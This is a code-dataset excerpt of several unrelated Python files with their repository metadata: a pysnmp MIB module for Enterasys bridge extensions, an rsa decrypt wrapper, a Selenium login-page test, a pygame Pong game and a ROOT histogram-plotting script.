etsysIetfBridgeDot1dStpBridgePriority = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 5)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpBridgePriorityDefault"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeDot1dStpBridgePriority = etsysIetfBridgeDot1dStpBridgePriority.setStatus('current')
etsysIetfBridgeSpanGuard = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 6)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpSpanGuardEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpSpanGuardBlockTime"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpSpanGuardTrapEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortSpanGuardBlocking"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeSpanGuard = etsysIetfBridgeSpanGuard.setStatus('current')
etsysIetfBridgeSpanGuardNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 7)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dSpanGuardPortBlocked"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeSpanGuardNotification = etsysIetfBridgeSpanGuardNotification.setStatus('current')
etsysIetfBridgeBackupRoot = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 8)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpBackupRootEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpBackupRootTrapEnable"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeBackupRoot = etsysIetfBridgeBackupRoot.setStatus('current')
etsysIetfBridgeBackupRootNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 9)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dBackupRootActivation"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeBackupRootNotification = etsysIetfBridgeBackupRootNotification.setStatus('current')
etsysIetfBridgePortCistRoleValue = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 10)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortCistRoleValue"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgePortCistRoleValue = etsysIetfBridgePortCistRoleValue.setStatus('current')
etsysIetfBridgeMovedAddr = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 11)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qMovedAddrTrapEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dBasePortMovedAddrTrap"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeMovedAddr = etsysIetfBridgeMovedAddr.setStatus('current')
etsysIetfBridgeDot1qFdbMovedAddrNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 12)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qFdbMovedAddr"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeDot1qFdbMovedAddrNotification = etsysIetfBridgeDot1qFdbMovedAddrNotification.setStatus('current')
etsysIetfBridgeLoopProtect = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 13)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortCistEnable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectEventThreshold"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectEventWindow"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeLoopProtect = etsysIetfBridgeLoopProtect.setStatus('current')
etsysIetfBridgeLoopProtectNotification = NotificationGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 14)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dCistLoopProtectEvent"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeLoopProtectNotification = etsysIetfBridgeLoopProtectNotification.setStatus('current')
etsysIetfBridgeStpCistNonForwardingReason = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 15)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpPortCistNonForwardingReason"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeStpCistNonForwardingReason = etsysIetfBridgeStpCistNonForwardingReason.setStatus('current')
etsysIetfBridgeStaticUcastAsMcast = ObjectGroup((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 1, 16)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qStaticUcastAsMcast"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeStaticUcastAsMcast = etsysIetfBridgeStaticUcastAsMcast.setStatus('current')
# Main compliance statement covering every group except the
# StaticUcastAsMcast group, which has its own compliance below.
etsysIetfBridgeCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 2, 1)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeStpPort"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeStpTrap"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeBase"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qFdbNewAddrNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeSpanGuard"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeSpanGuardNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeBackupRoot"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeBackupRootNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1dStpBridgePriority"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgePortCistRoleValue"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeMovedAddr"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeDot1qFdbMovedAddrNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeLoopProtect"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeLoopProtectNotification"), ("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeStpCistNonForwardingReason"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeCompliance = etsysIetfBridgeCompliance.setStatus('current')
etsysIetfBridgeStaticUcastAsMcastCompliance = ModuleCompliance((1, 3, 6, 1, 4, 1, 5624, 1, 2, 31, 2, 2, 2)).setObjects(("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", "etsysIetfBridgeStaticUcastAsMcast"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
    etsysIetfBridgeStaticUcastAsMcastCompliance = etsysIetfBridgeStaticUcastAsMcastCompliance.setStatus('current')
# Register every managed object defined above with the MIB builder so
# other modules can import them; PYSNMP_MODULE_ID marks the module
# identity object for the loader.
mibBuilder.exportSymbols("ENTERASYS-IETF-BRIDGE-MIB-EXT-MIB", etsysIetfBridgeDot1dBase=etsysIetfBridgeDot1dBase, etsysIetfBridgeDot1dStpTopChangeTrapEnable=etsysIetfBridgeDot1dStpTopChangeTrapEnable, etsysIetfBridgeDot1dStpPortStpEnable=etsysIetfBridgeDot1dStpPortStpEnable, etsysIetfBridgeDot1qFdbMovedAddrNotification=etsysIetfBridgeDot1qFdbMovedAddrNotification, etsysIetfBridgeDot1dStp=etsysIetfBridgeDot1dStp, etsysIetfBridgeDot1dSpanGuard=etsysIetfBridgeDot1dSpanGuard, etsysIetfBridgeDot1dBackupRoot=etsysIetfBridgeDot1dBackupRoot, etsysIetfBridgeDot1dStpPortTable=etsysIetfBridgeDot1dStpPortTable, etsysIetfBridgeSpanGuardNotification=etsysIetfBridgeSpanGuardNotification, etsysIetfBridgeGroups=etsysIetfBridgeGroups, etsysIetfBridgeDot1qFdbNewAddrNotification=etsysIetfBridgeDot1qFdbNewAddrNotification, etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable=etsysIetfBridgeDot1dStpLoopProtectPortPartnerCapable, etsysIetfBridgeDot1qFdbMovedAddr=etsysIetfBridgeDot1qFdbMovedAddr, etsysIetfBridgeDot1qMovedAddrTrapEnable=etsysIetfBridgeDot1qMovedAddrTrapEnable, etsysIetfBridgeLoopProtect=etsysIetfBridgeLoopProtect, etsysIetfBridgeMibExtMIB=etsysIetfBridgeMibExtMIB, etsysIetfBridgeStpCistNonForwardingReason=etsysIetfBridgeStpCistNonForwardingReason, etsysIetfBridgeDot1dBasePortTable=etsysIetfBridgeDot1dBasePortTable, etsysIetfBridgeSpanGuard=etsysIetfBridgeSpanGuard, etsysIetfBridgeCompliances=etsysIetfBridgeCompliances, etsysIetfBridgeDot1dBasePortMovedAddrTrap=etsysIetfBridgeDot1dBasePortMovedAddrTrap, etsysIetfBridgeDot1dStpNewRootTrapEnable=etsysIetfBridgeDot1dStpNewRootTrapEnable, etsysIetfBridgeDot1dStpLoopProtectPortTable=etsysIetfBridgeDot1dStpLoopProtectPortTable, etsysIetfBridgePortCistRoleValue=etsysIetfBridgePortCistRoleValue, etsysIetfBridgeLoopProtectNotification=etsysIetfBridgeLoopProtectNotification, etsysIetfBridgeBackupRoot=etsysIetfBridgeBackupRoot, PYSNMP_MODULE_ID=etsysIetfBridgeMibExtMIB, etsysIetfBridgeMibExt=etsysIetfBridgeMibExt, 
etsysIetfBridgeDot1dStpBackupRootEnable=etsysIetfBridgeDot1dStpBackupRootEnable, etsysIetfBridgeDot1dStpLoopProtectPortCistEnable=etsysIetfBridgeDot1dStpLoopProtectPortCistEnable, etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap=etsysIetfBridgeDot1dBasePortNewLearnedAddrTrap, etsysIetfBridgeCompliance=etsysIetfBridgeCompliance, etsysIetfBridgeDot1dStpPortSpanGuardBlocking=etsysIetfBridgeDot1dStpPortSpanGuardBlocking, etsysIetfBridgeDot1dStpSpanGuardEnable=etsysIetfBridgeDot1dStpSpanGuardEnable, etsysIetfBridgeDot1dSpanGuardPortBlocked=etsysIetfBridgeDot1dSpanGuardPortBlocked, etsysIetfBridgeStaticUcastAsMcast=etsysIetfBridgeStaticUcastAsMcast, etsysIetfBridgeStpPort=etsysIetfBridgeStpPort, etsysIetfBridgeDot1dStpBackupRootTrapEnable=etsysIetfBridgeDot1dStpBackupRootTrapEnable, etsysIetfBridgeDot1dCistLoopProtectEvent=etsysIetfBridgeDot1dCistLoopProtectEvent, etsysIetfBridgeBase=etsysIetfBridgeBase, etsysIetfBridgeDot1dStpLoopProtectEventThreshold=etsysIetfBridgeDot1dStpLoopProtectEventThreshold, etsysIetfBridgeDot1qFdbNewLearnedAddr=etsysIetfBridgeDot1qFdbNewLearnedAddr, etsysIetfBridgeDot1dStpSpanGuardTrapEnable=etsysIetfBridgeDot1dStpSpanGuardTrapEnable, etsysIetfBridgeDot1dStpLoopProtectEventWindow=etsysIetfBridgeDot1dStpLoopProtectEventWindow, etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking=etsysIetfBridgeDot1dStpLoopProtectPortCistBlocking, etsysIetfBridgeStaticUcastAsMcastCompliance=etsysIetfBridgeStaticUcastAsMcastCompliance, etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable=etsysIetfBridgeDot1dStpLoopProtectEventTrapEnable, etsysIetfBridgeStpTrap=etsysIetfBridgeStpTrap, etsysIetfBridgeConformance=etsysIetfBridgeConformance, etsysIetfBridgeMovedAddr=etsysIetfBridgeMovedAddr, etsysIetfBridgeDot1Notifications=etsysIetfBridgeDot1Notifications, etsysIetfBridgeDot1dStpPortEntry=etsysIetfBridgeDot1dStpPortEntry, etsysIetfBridgeDot1qBase=etsysIetfBridgeDot1qBase, etsysIetfBridgeDot1dStpLoopProtectPortEntry=etsysIetfBridgeDot1dStpLoopProtectPortEntry, 
etsysIetfBridgeDot1dStpPortCistRoleValue=etsysIetfBridgeDot1dStpPortCistRoleValue, etsysIetfBridgeDot1dStpPortCistNonForwardingReason=etsysIetfBridgeDot1dStpPortCistNonForwardingReason, etsysIetfBridgeDot1dStpSpanGuardBlockTime=etsysIetfBridgeDot1dStpSpanGuardBlockTime, etsysIetfBridgeBackupRootNotification=etsysIetfBridgeBackupRootNotification, etsysIetfBridgeDot1dStpBridgePriorityDefault=etsysIetfBridgeDot1dStpBridgePriorityDefault, etsysIetfBridgeDot1dLoopProtect=etsysIetfBridgeDot1dLoopProtect, etsysIetfBridgeDot1qNewLearnedAddrTrapEnable=etsysIetfBridgeDot1qNewLearnedAddrTrapEnable, etsysIetfBridgeDot1dBasePortEntry=etsysIetfBridgeDot1dBasePortEntry, etsysIetfBridgeDot1dStpBridgePriority=etsysIetfBridgeDot1dStpBridgePriority, etsysIetfBridgeDot1qStaticUcastAsMcast=etsysIetfBridgeDot1qStaticUcastAsMcast, etsysIetfBridgeDot1dBackupRootActivation=etsysIetfBridgeDot1dBackupRootActivation)
|
[
"dcwangmit01@gmail.com"
] |
dcwangmit01@gmail.com
|
65a771ca99989d98e565f0ae2822d9a4524fbfd5
|
d43bc1e7f8ae583f0cb187cc174b28dca31da11d
|
/venv3/bin/pyrsa-decrypt
|
d268eb316a19fbcd931f698719055b9377188ead
|
[] |
no_license
|
akashshinde/cmd-line-e2e-tests
|
b19d04798b439e59ea47cc9d19bdd6840dcbaa84
|
3d8ac054bd9304bb6675ac208125996e94ac0feb
|
refs/heads/master
| 2020-07-26T15:30:08.899585
| 2019-09-16T02:18:54
| 2019-09-16T02:18:54
| 208,691,284
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 250
|
#!/Users/akash/Downloads/boilerplate/venv3/bin/python
# -*- coding: utf-8 -*-
# Auto-generated console-script wrapper (setuptools/pip) for the
# `pyrsa-decrypt` entry point of the `rsa` package.
import re
import sys
from rsa.cli import decrypt
if __name__ == '__main__':
    # Strip a trailing "-script.py"/"-script.pyw"/".exe" (left by installer
    # wrappers, mainly on Windows) so the CLI sees its canonical name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    # Exit with whatever status decrypt() returns.
    sys.exit(decrypt())
|
[
"akashshinde159@gmail.com"
] |
akashshinde159@gmail.com
|
|
98c74234ac1ebabd1332865d2ad01b254378827a
|
dee52aecc2801e43c5937c13ce525ba6ba283859
|
/employeesSignIn.py
|
2b57dba5d836f2b720a6c98671886e01053dcb77
|
[] |
no_license
|
QurashiQA/FirstTest
|
80f4c94dcf3c703d7713dce26a7d71c0b7e43365
|
4d7595ee5f70d30d9ea230218ee6e52b0a0a7073
|
refs/heads/master
| 2020-12-02T07:42:34.658360
| 2017-07-09T23:25:02
| 2017-07-09T23:25:02
| 96,715,189
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,100
|
py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import selenium

# Shared browser session and error log for this smoke test of dareebatech.com.
Dtech = webdriver.Firefox()
Dtech.get("http://www.dareebatech.com")
failuer = []

def employeeSignInPageLoading():
    """Click the employee sign-in button and verify the login page URL loads.

    Appends "error 1" to the shared `failuer` list on failure, then prints
    the current error status.
    """
    result = Dtech.find_element_by_css_selector("a.btn:nth-child(3)")
    result.click()
    try:
        assert "dareebatech.com/individual/login" in Dtech.current_url
    except AssertionError:
        failuer.append("error 1")
    # Bug fix: the original tested `failuer.__len__() > 1`, so a single
    # recorded failure still printed "No Errors". Any failure is reported.
    if failuer:
        print(failuer)
    else:
        print("No Errors")

def employeeLogInEmail():
    """Submit bogus credentials and verify the page reports them incorrect.

    Appends "error 2" to `failuer` when the expected "incorrect" message
    is not found in the resulting page.
    """
    email = Dtech.find_element_by_id("email")
    email.send_keys("qurshi@qurshi.com")
    password = Dtech.find_element_by_id("password")
    password.send_keys("this is my password")
    enter = Dtech.find_element_by_css_selector(".btn")
    enter.click()
    try:
        # Bug fix: the original asserted `"incorrect" in source == True`
        # (a chained comparison) on a `source` variable that was only
        # assigned *after* this function ran, so the check always raised
        # NameError, was swallowed by a bare except, and falsely logged
        # "error 2". Read the live page source instead.
        assert "incorrect" in Dtech.page_source
    except AssertionError:
        failuer.append("error 2")

employeeSignInPageLoading()
employeeLogInEmail()
print(failuer)
Dtech.close()
|
[
"C:\\Users\\q\\AppData\\Roaming\\The Bat!"
] |
C:\Users\q\AppData\Roaming\The Bat!
|
1e2f6a0b6cd31ddb5d275c86722270db9afa02be
|
fdcfd3b0cf266b6327d800c6a861f6071700510e
|
/pong.py
|
52e53b05352a7fb024c245ef3fb3695f73739893
|
[] |
no_license
|
kavinbharathii/pong_pygame
|
c7ae8e536bad400f60e7e9be2ba7a65a077fbb9c
|
514cb44d0aaeb0952279f42eb66ae20b5bc72e74
|
refs/heads/main
| 2023-01-08T01:40:09.185463
| 2020-11-06T10:06:26
| 2020-11-06T10:06:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,178
|
py
|
import pygame
# Window geometry and display surface.
WIDTH = 720
HEIGHT = 560
display = pygame.display.set_mode((WIDTH, HEIGHT))
pygame.display.set_caption('Pong')
frame_rate = 90
# Ball ("pong") starts centered; player paddle on the right edge,
# opponent paddle on the left edge, both vertically centered.
pong = pygame.Rect((WIDTH // 2) - 10, (HEIGHT // 2) - 10, 20, 20)
player = pygame.Rect(WIDTH - 20, HEIGHT // 2 - 45, 10, 90)
opponent = pygame.Rect(10, HEIGHT // 2 - 45, 10, 90)
# Per-frame ball velocity components and paddle speeds, in pixels/frame.
pong_x = 3
pong_y = 3
player_vel = 5
opponent_vel = 5
# Colors: dark background, light foreground for paddles/ball/midline.
bgcolor = pygame.Color('grey12')
light_grey = (200, 200, 200)
def pong_physics():
    """Advance the ball by one frame and resolve wall/paddle interactions.

    Mutates the module-level `pong` rect and the velocity globals:
    leaving the field left/right recenters the ball, hitting top/bottom
    reflects vertically, touching a paddle reflects horizontally.
    NOTE(review): the reset x, (WIDTH // 2) - 15, differs by 5px from the
    initial spawn x of (WIDTH // 2) - 10 — presumably unintentional.
    """
    global pong_x, pong_y
    pong.x = pong.x + pong_x
    pong.y = pong.y + pong_y
    left_or_right_out = pong.x <= 0 or pong.x >= WIDTH - 15
    if left_or_right_out:
        # Ball passed a paddle: recenter it (velocity is kept as-is).
        pong.x, pong.y = (WIDTH // 2) - 15, (HEIGHT // 2) - 10
    if pong.y <= 0 or pong.y >= HEIGHT - 15:
        pong_y = -pong_y
    if pong.colliderect(player) or pong.colliderect(opponent):
        pong_x = -pong_x
def main():
    """Run the game loop: input, opponent AI, physics, and rendering."""
    global pong_x, pong_y, player_vel
    run = True
    clock = pygame.time.Clock()
    while run:
        display.fill(bgcolor)
        clock.tick(frame_rate)
        keys = pygame.key.get_pressed()
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                run = False
        # Player paddle: arrow keys, clamped 5px inside the top/bottom edges.
        if keys[pygame.K_UP]:
            player.y -= player_vel
            if player.y <= 0:
                player.y = 5
        if keys[pygame.K_DOWN]:
            player.y += player_vel
            if player.y + player.height >= HEIGHT:
                player.y = HEIGHT - player.height- 5
        # Opponent "AI": track the ball's y, clamped the same way.
        if opponent.y < pong.y:
            opponent.y += opponent_vel
        if opponent.y > pong.y:
            opponent.y -= opponent_vel
        if opponent.y <= 0:
            opponent.y = 5
        if opponent.y + opponent.height >= HEIGHT:
            opponent.y = HEIGHT - opponent.height - 5
        # Move the ball, then draw midline, paddles, ball, and present.
        pong_physics()
        pygame.draw.line(display, light_grey, (WIDTH // 2, 0),
                         (WIDTH // 2, HEIGHT))
        pygame.draw.rect(display, light_grey, player)
        pygame.draw.rect(display, light_grey, opponent)
        pygame.draw.ellipse(display, light_grey, pong)
        pygame.display.flip()

if __name__ == '__main__':
    main()
|
[
"noreply@github.com"
] |
kavinbharathii.noreply@github.com
|
adf8ed52a68df9b5f6007f0197fd015a3c5decb0
|
12cee1912bed05e648b29e51f9f424b56fb9f9a5
|
/TrackAnalyzer/test/makePlots.py
|
1744820df2cc9f548da6e556cc3e92d42ecbe69d
|
[] |
no_license
|
mhwalker/MWalker
|
2a3ad48079d46ee4bb021fe83c4fbd66e2dfe9a8
|
4cf5dd485e67d0ef7eb714a7b03696ff59edc970
|
refs/heads/master
| 2021-01-18T23:26:53.931098
| 2016-07-14T19:41:24
| 2016-07-14T19:41:24
| 19,110,312
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,876
|
py
|
# Python 2 / PyROOT plotting script: loads histograms produced by the
# TrackAnalyzer job and renders them to .eps files.
from ROOT import *
gROOT.SetStyle("Plain")
gStyle.SetPalette(1)
#gROOT.SetOptStat(0)
# Analyzer output file; all histograms below are fetched from it.
f = TFile("trackAnalyzerOut.root")
# 1-D distributions for duplicate tracks.
# NOTE(review): d_pdR and d_vdR are fetched but never drawn below.
d_eta = f.Get("duplicate_eta")
d_pdR = f.Get("duplicate_pdR")
d_vdR = f.Get("duplicate_vdR")
d_bestdR = f.Get("duplicate_bestdR")
d_minDelta = f.Get("duplicate_minDelta")
d_mPT = f.Get("duplicate_matchedPerTrack")
d_dpT = f.Get("duplicate_deltapT")
d_nHits = f.Get("duplicate_nSharedHits")
# 2-D track-pair correlation histograms (duplicate pairs).
d_innerR = f.Get("duplicate_innerR")
d_outerR = f.Get("duplicate_outerR")
d_nHits2 = f.Get("duplicate_nHits")
d_pT = f.Get("duplicate_pT")
d_R = f.Get("duplicate_deltaR")
d_nMissingHits = f.Get("duplicate_nMissingHits")
# 2-D track-parameter correlations for duplicate pairs (d2_*) and for
# combinatorial pairs (c2_*), used for the side-by-side comparison plots.
d2_q = f.Get("duplicate_qoverp")
d2_l = f.Get("duplicate_lambda")
d2_p = f.Get("duplicate_phi")
d2_x = f.Get("duplicate_dxy")
d2_z = f.Get("duplicate_dsz")
c2_q = f.Get("comb_qoverp")
c2_l = f.Get("comb_lambda")
c2_p = f.Get("comb_phi")
c2_x = f.Get("comb_dxy")
c2_z = f.Get("comb_dsz")
# Single canvas reused for every plot; each histogram is drawn, saved to
# its own .eps, then the canvas is cleared.
c = TCanvas("c","",800,600)
# --- 1-D duplicate-track plots, log-scale y axis ---
c.SetLogy()
d_eta.SetXTitle("#eta of sim tracks")
d_eta.Draw()
c.SaveAs("eta.eps")
c.Clear()
d_nHits.SetXTitle("number of shared hits")
d_nHits.Draw()
c.SaveAs("nSharedHits.eps")
c.Clear()
d_minDelta.GetXaxis().SetRangeUser(0,50)
d_minDelta.SetXTitle("#Delta x inner to outer")
d_minDelta.Draw()
c.SaveAs("minDelta.eps")
c.Clear()
d_dpT.SetXTitle("(p_{T1} - p_{T2})/p_{T1}")
d_dpT.Draw()
c.SaveAs("dpT.eps")
c.Clear()
d_mPT.SetXTitle("N matched reco tracks to a sim track")
d_mPT.Draw()
c.SaveAs("matchedTracks.eps")
c.Clear()
d_bestdR.SetXTitle("#Delta R inner to outer")
d_bestdR.Draw()
c.SaveAs("bestdR.eps")
c.Clear()
# --- 2-D correlation plots, linear y, drawn with the color-map option ---
c.SetLogy(0)
d_innerR.SetXTitle("innerPosition Radius")
d_innerR.SetYTitle("innerPosition Radius")
d_innerR.Draw("colz")
c.SaveAs("innerR.eps")
c.Clear()
d_outerR.SetXTitle("outerPosition Radius")
d_outerR.SetYTitle("outerPosition Radius")
d_outerR.Draw("colz")
c.SaveAs("outerR.eps")
c.Clear()
d_nHits2.SetXTitle("nHits")
d_nHits2.SetYTitle("nHits")
d_nHits2.Draw("colz")
c.SaveAs("nHits.eps")
c.Clear()
d_nMissingHits.SetXTitle("nMissingHits")
d_nMissingHits.SetYTitle("nMissingHits")
d_nMissingHits.Draw("colz")
c.SaveAs("nMissingHits.eps")
c.Clear()
d_pT.SetXTitle("innerMomentum pT")
d_pT.SetYTitle("innerMomentum pT")
d_pT.Draw("colz")
c.SaveAs("pT2d.eps")
c.Clear()
d_R.SetXTitle("deltaR inner to outer")
d_R.Draw()
c.SaveAs("deltaR.eps")
c.Clear()
# --- 2-D track-parameter correlations: duplicate pairs ---
d2_q.SetXTitle("q over p")
d2_q.SetYTitle("q over p")
d2_q.Draw("colz")
c.SaveAs("duplicate_qoverp2d.eps")
c.Clear()
d2_l.SetXTitle("lambda")
d2_l.SetYTitle("lambda")
d2_l.Draw("colz")
c.SaveAs("duplicate_lambda2d.eps")
c.Clear()
d2_p.SetXTitle("phi")
d2_p.SetYTitle("phi")
d2_p.Draw("colz")
c.SaveAs("duplicate_phi2d.eps")
c.Clear()
d2_x.SetXTitle("dxy")
d2_x.SetYTitle("dxy")
d2_x.Draw("colz")
c.SaveAs("duplicate_dxy2d.eps")
c.Clear()
d2_z.SetXTitle("dsz")
d2_z.SetYTitle("dsz")
d2_z.Draw("colz")
c.SaveAs("duplicate_dsz2d.eps")
c.Clear()
# --- Same parameter correlations for combinatorial pairs ---
c2_q.SetXTitle("q over p")
c2_q.SetYTitle("q over p")
c2_q.Draw("colz")
c.SaveAs("comb_qoverp2d.eps")
c.Clear()
c2_l.SetXTitle("lambda")
c2_l.SetYTitle("lambda")
c2_l.Draw("colz")
c.SaveAs("comb_lambda2d.eps")
c.Clear()
c2_p.SetXTitle("phi")
c2_p.SetYTitle("phi")
c2_p.Draw("colz")
c.SaveAs("comb_phi2d.eps")
c.Clear()
c2_x.SetXTitle("dxy")
c2_x.SetYTitle("dxy")
c2_x.Draw("colz")
c.SaveAs("comb_dxy2d.eps")
c.Clear()
c2_z.SetXTitle("dsz")
c2_z.SetYTitle("dsz")
c2_z.Draw("colz")
c.SaveAs("comb_dsz2d.eps")
c.Clear()
# Overlay duplicate vs combinatorial distributions for each comparison
# variable; duplicates are scaled x40 so both are visible on one plot.
comparisons = ['dqoverp','dlambda','dphi','ddxy','ddsz','bestdR','chi2','pcaR']
for co in comparisons:
    m = f.Get("duplicate_"+co)
    u = f.Get("comb_"+co)
    u.SetXTitle(co)
    u.GetYaxis().SetRangeUser(0,u.GetMaximum()*1.1)
    u.SetLineColor(kBlack)
    m.Scale(40)
    m.SetLineColor(kRed)
    c.SetLogy(0)
    # These three variables are better viewed on a log y scale.
    if co == 'bestdR' or co == 'chi2' or co == 'pcaR':
        u.GetYaxis().SetRangeUser(0.1,u.GetMaximum()*5)
        c.SetLogy()
    u.Draw()
    m.Draw("same")
    leg = TLegend(0.6,0.5,0.85,0.85)
    leg.AddEntry(u,"combinatorics","l")
    leg.AddEntry(m,"duplicates X40","l")
    leg.SetFillColor(kWhite)
    leg.Draw()
    c.SaveAs(co+".eps")
    c.Clear()
# Cut-flow plots: q/p distributions after each successive selection cut,
# for duplicates (dupcut) and combinatorics (comcut), plus their ratio.
cuthistos = ['cut0_pcaR','cut1_dphi','cut2_ddsz','cut3_dlambda','cut4_ddxy','cut5_innerR']
dupcut = []
comcut = []
ratios = []
# Index 0 is the uncut distribution; cuts follow in order.
dupcut.append(f.Get("duplicate_dqoverp"))
comcut.append(f.Get("comb_dqoverp"))
for ch in cuthistos:
    dd = f.Get("duplicate_"+ch)
    cc = f.Get("comb_"+ch)
    # Detach from the file so the clone survives independently.
    # NOTE(review): only dd is detached; cc presumably should be too.
    dd.SetDirectory(0)
    dupcut.append(dd)
    comcut.append(cc)
c.Clear()
c.SetLogy()
comcut[0].SetLineColor(kRed)
dupcut[0].SetLineColor(kRed)
comcut[0].GetYaxis().SetRangeUser(0.1,5*comcut[0].GetMaximum())
dupcut[0].GetYaxis().SetRangeUser(0.1,5*dupcut[0].GetMaximum())
comcut[0].SetXTitle("q / p")
dupcut[0].SetXTitle("q / p")
